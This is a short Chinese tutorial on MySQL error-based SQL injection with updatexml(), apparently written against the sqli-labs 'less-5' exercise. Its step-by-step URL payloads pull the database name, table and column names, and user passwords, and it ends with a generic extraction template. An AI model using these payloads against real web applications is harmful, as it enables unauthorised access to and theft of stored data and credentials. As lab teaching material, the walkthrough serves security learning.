mysql报错注入updatexml

1. 首先了解下updatexml()函数
   UPDATEXML (XML_document, XPath_string, new_value);
   第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
   第二个参数：XPath_string (Xpath格式的字符串)
   第三个参数：new_value，String格式，替换查找到的符合条件的数据
2. 查询数据库

less-5/?id=1' and updatexml(1,concat(0x7e,(select  database()),0x7e),1)+--+

1.jpg

3. 查询数据表

less-5/?id=1' and updatexml(1,concat(0x7e,(select concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1),0x7e),1)+--+

4. 查询列名

/less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 1,1),0x7e),1)+--+
#table_schema=库名的16禁止编码
#table_name=表名的16进制编码

5. 查询数据

less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)+--+
#
and updatexml(1,concat(0x7e,(select 列名 from 表名 limit 0,1),0x7e),1)

2.jpg